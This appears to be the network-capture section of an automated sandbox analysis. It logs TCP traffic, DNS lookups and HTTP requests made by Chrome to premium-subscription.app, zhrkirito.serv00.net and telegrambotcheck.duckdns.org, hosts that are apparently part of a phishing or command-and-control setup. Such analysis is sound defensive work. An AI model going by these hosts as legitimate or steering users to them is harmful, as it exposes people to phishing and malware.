                                                                                                                      Jan 13, 2025 00:23:37.058259964 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.058316946 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.058362007 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.058372974 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.058373928 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.058406115 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.058454990 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.058502913 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.058502913 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.058502913 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.058603048 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.137500048 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.137521029 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.137636900 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.137672901 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.138164043 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.145086050 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.145101070 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.145176888 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:37.145209074 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.147365093 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.149822950 CET49774443192.168.2.413.32.121.94
                                                                                                                      Jan 13, 2025 00:23:37.149857998 CET4434977413.32.121.94192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:21.650645018 CET497615001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:21.655424118 CET500149761102.165.14.4192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:21.681883097 CET497625001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:21.686691999 CET500149762102.165.14.4192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:22.279232979 CET49834443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:24:22.279264927 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:22.279324055 CET49834443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:24:22.280157089 CET49834443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:24:22.280165911 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:22.760232925 CET4972480192.168.2.42.22.50.131
                                                                                                                      Jan 13, 2025 00:24:22.765274048 CET80497242.22.50.131192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:22.765335083 CET4972480192.168.2.42.22.50.131
                                                                                                                      Jan 13, 2025 00:24:22.931651115 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:22.932209969 CET49834443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:24:22.932226896 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:22.932593107 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:22.933337927 CET49834443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:24:22.933410883 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:22.978775024 CET49834443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:24:32.846659899 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:32.846729040 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:32.846884966 CET49834443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:24:34.783695936 CET49834443192.168.2.4142.250.185.132
                                                                                                                      Jan 13, 2025 00:24:34.783727884 CET44349834142.250.185.132192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:36.676253080 CET500149762102.165.14.4192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:36.677813053 CET500149761102.165.14.4192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:36.728738070 CET497625001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:36.728817940 CET497615001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:36.893796921 CET497615001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:36.893884897 CET497615001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:36.894232988 CET497625001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:36.894356012 CET497625001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:36.902568102 CET500149761102.165.14.4192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:36.902581930 CET500149762102.165.14.4192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:36.902664900 CET497615001192.168.2.4102.165.14.4
                                                                                                                      Jan 13, 2025 00:24:36.902719021 CET497625001192.168.2.4102.165.14.4
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 13, 2025 00:23:18.525995970 CET53512681.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:18.539129019 CET53639671.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:19.611035109 CET53556501.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:22.282876015 CET5920953192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:22.288343906 CET6246553192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:22.289520979 CET53592091.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:22.295547962 CET53624651.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:24.465861082 CET5916953192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:24.466272116 CET5496753192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:24.796641111 CET53591691.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:24.796660900 CET53549671.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:26.984765053 CET53550681.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:28.137952089 CET53610801.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:28.169713974 CET6083253192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:28.170423985 CET5557053192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:28.179358006 CET53608321.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:28.179378986 CET53555701.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:32.139877081 CET6098853192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:32.140188932 CET5448053192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:32.146842003 CET53609881.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:32.146950006 CET53544801.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:32.992207050 CET5530553192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:32.992716074 CET5050353192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:32.999176025 CET53553051.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:32.999475956 CET53505031.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:34.260931969 CET5780253192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:34.261949062 CET5909153192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:34.399971962 CET53578021.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:34.503561974 CET53590911.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:35.067976952 CET5414753192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:35.068101883 CET5403453192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:35.073863983 CET53529991.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:35.075433016 CET53541471.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:35.080586910 CET53540341.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:35.085019112 CET138138192.168.2.4192.168.2.255
                                                                                                                      Jan 13, 2025 00:23:35.092848063 CET5977653192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:35.092986107 CET6483853192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:35.101325035 CET53648381.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:35.101538897 CET53597761.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:35.175614119 CET53613001.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:35.534753084 CET5075853192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:35.534995079 CET5042253192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:35.541567087 CET53504221.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:36.127554893 CET5275853192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:36.127665997 CET6216553192.168.2.41.1.1.1
                                                                                                                      Jan 13, 2025 00:23:36.138775110 CET53527581.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:36.140146017 CET53621651.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:36.970705986 CET53523711.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:23:56.076225996 CET53495211.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:17.846487999 CET53536411.1.1.1192.168.2.4
                                                                                                                      Jan 13, 2025 00:24:19.774418116 CET53599481.1.1.1192.168.2.4
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Jan 13, 2025 00:23:22.282876015 CET192.168.2.41.1.1.10x4d02Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:22.288343906 CET192.168.2.41.1.1.10xaaeaStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:24.465861082 CET192.168.2.41.1.1.10xc723Standard query (0)premium-subscription.appA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:24.466272116 CET192.168.2.41.1.1.10xd929Standard query (0)premium-subscription.app65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:28.169713974 CET192.168.2.41.1.1.10x1c28Standard query (0)zhrkirito.serv00.netA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:28.170423985 CET192.168.2.41.1.1.10xc0cStandard query (0)zhrkirito.serv00.net65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.139877081 CET192.168.2.41.1.1.10x771bStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.140188932 CET192.168.2.41.1.1.10x8d93Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.992207050 CET192.168.2.41.1.1.10x3baeStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.992716074 CET192.168.2.41.1.1.10xfbdaStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:34.260931969 CET192.168.2.41.1.1.10x2415Standard query (0)telegrambotcheck.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:34.261949062 CET192.168.2.41.1.1.10x800dStandard query (0)_5001._https.telegrambotcheck.duckdns.org65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.067976952 CET192.168.2.41.1.1.10x1b97Standard query (0)static-00.iconduck.comA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.068101883 CET192.168.2.41.1.1.10x30b2Standard query (0)static-00.iconduck.com65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.092848063 CET192.168.2.41.1.1.10x3811Standard query (0)zhrkirito.serv00.netA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.092986107 CET192.168.2.41.1.1.10x887fStandard query (0)zhrkirito.serv00.net65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.534753084 CET192.168.2.41.1.1.10x6cf0Standard query (0)crt.sectigo.comA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.534995079 CET192.168.2.41.1.1.10x6776Standard query (0)crt.sectigo.com65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:36.127554893 CET192.168.2.41.1.1.10x8cd8Standard query (0)static-00.iconduck.comA (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:36.127665997 CET192.168.2.41.1.1.10x7c79Standard query (0)static-00.iconduck.com65IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Jan 13, 2025 00:23:22.289520979 CET1.1.1.1192.168.2.40x4d02No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:22.295547962 CET1.1.1.1192.168.2.40xaaeaNo error (0)www.google.com65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:24.796641111 CET1.1.1.1192.168.2.40xc723No error (0)premium-subscription.app45.88.108.231A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:28.179358006 CET1.1.1.1192.168.2.40x1c28No error (0)zhrkirito.serv00.net128.204.223.98A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:31.874439955 CET1.1.1.1192.168.2.40x1a78No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:31.874439955 CET1.1.1.1192.168.2.40x1a78No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:31.874439955 CET1.1.1.1192.168.2.40x1a78No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:31.874439955 CET1.1.1.1192.168.2.40x1a78No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:31.874439955 CET1.1.1.1192.168.2.40x1a78No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:31.874439955 CET1.1.1.1192.168.2.40x1a78No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:31.874439955 CET1.1.1.1192.168.2.40x1a78No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:31.874439955 CET1.1.1.1192.168.2.40x1a78No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.146842003 CET1.1.1.1192.168.2.40x771bNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.146842003 CET1.1.1.1192.168.2.40x771bNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.146950006 CET1.1.1.1192.168.2.40x8d93No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.999176025 CET1.1.1.1192.168.2.40x3baeNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.999176025 CET1.1.1.1192.168.2.40x3baeNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:32.999475956 CET1.1.1.1192.168.2.40xfbdaNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:34.000811100 CET1.1.1.1192.168.2.40xec04No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:34.000811100 CET1.1.1.1192.168.2.40xec04No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:34.399971962 CET1.1.1.1192.168.2.40x2415No error (0)telegrambotcheck.duckdns.org102.165.14.4A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.075433016 CET1.1.1.1192.168.2.40x1b97No error (0)static-00.iconduck.comd72ilj4fw1mla.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.075433016 CET1.1.1.1192.168.2.40x1b97No error (0)d72ilj4fw1mla.cloudfront.net13.32.121.48A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.075433016 CET1.1.1.1192.168.2.40x1b97No error (0)d72ilj4fw1mla.cloudfront.net13.32.121.91A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.075433016 CET1.1.1.1192.168.2.40x1b97No error (0)d72ilj4fw1mla.cloudfront.net13.32.121.94A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.075433016 CET1.1.1.1192.168.2.40x1b97No error (0)d72ilj4fw1mla.cloudfront.net13.32.121.61A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.080586910 CET1.1.1.1192.168.2.40x30b2No error (0)static-00.iconduck.comd72ilj4fw1mla.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.101538897 CET1.1.1.1192.168.2.40x3811No error (0)zhrkirito.serv00.net128.204.223.98A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.541511059 CET1.1.1.1192.168.2.40x6cf0No error (0)crt.sectigo.comcrt.comodoca.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:35.541567087 CET1.1.1.1192.168.2.40x6776No error (0)crt.sectigo.comcrt.comodoca.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:36.138775110 CET1.1.1.1192.168.2.40x8cd8No error (0)static-00.iconduck.comd72ilj4fw1mla.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:36.138775110 CET1.1.1.1192.168.2.40x8cd8No error (0)d72ilj4fw1mla.cloudfront.net13.32.121.94A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:36.138775110 CET1.1.1.1192.168.2.40x8cd8No error (0)d72ilj4fw1mla.cloudfront.net13.32.121.48A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:36.138775110 CET1.1.1.1192.168.2.40x8cd8No error (0)d72ilj4fw1mla.cloudfront.net13.32.121.61A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:36.138775110 CET1.1.1.1192.168.2.40x8cd8No error (0)d72ilj4fw1mla.cloudfront.net13.32.121.91A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:36.140146017 CET1.1.1.1192.168.2.40x7c79No error (0)static-00.iconduck.comd72ilj4fw1mla.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:52.088824034 CET1.1.1.1192.168.2.40x7b69No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:23:52.088824034 CET1.1.1.1192.168.2.40x7b69No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:24:11.157912016 CET1.1.1.1192.168.2.40x5428No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:24:11.157912016 CET1.1.1.1192.168.2.40x5428No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:24:12.404287100 CET1.1.1.1192.168.2.40x3f77No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:24:12.404287100 CET1.1.1.1192.168.2.40x3f77No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:24:30.988811016 CET1.1.1.1192.168.2.40xb6acNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Jan 13, 2025 00:24:30.988811016 CET1.1.1.1192.168.2.40xb6acNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                      • premium-subscription.app
                                                                                                                      • https:
                                                                                                                        • zhrkirito.serv00.net
                                                                                                                        • cdnjs.cloudflare.com
                                                                                                                        • static-00.iconduck.com
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.44974045.88.108.2314432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:25 UTC671OUTGET /plan HTTP/1.1
                                                                                                                      Host: premium-subscription.app
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:25 UTC245INHTTP/1.1 301 Moved Permanently
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:25 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Content-Length: 321
                                                                                                                      Connection: close
                                                                                                                      Location: https://premium-subscription.app/plan/
                                                                                                                      X-Powered-By: PleskLin
                                                                                                                      2025-01-12 23:23:25 UTC321INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 65 6d 69 75 6d 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2e 61 70 70 2f 70 6c 61 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://premium-subscription.app/plan/">here</a>.</p><hr><address>Apache Ser


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.44974145.88.108.2314432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:25 UTC672OUTGET /plan/ HTTP/1.1
                                                                                                                      Host: premium-subscription.app
                                                                                                                      Connection: keep-alive
                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:26 UTC221INHTTP/1.1 302 Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:25 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 0
                                                                                                                      Connection: close
                                                                                                                      X-Powered-By: PHP/7.3.33
                                                                                                                      location: ./apps/
                                                                                                                      X-Powered-By: PleskLin


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.44974245.88.108.2314432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:26 UTC677OUTGET /plan/apps/ HTTP/1.1
                                                                                                                      Host: premium-subscription.app
                                                                                                                      Connection: keep-alive
                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:26 UTC231INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:26 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      X-Powered-By: PHP/7.3.33
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      X-Powered-By: PleskLin
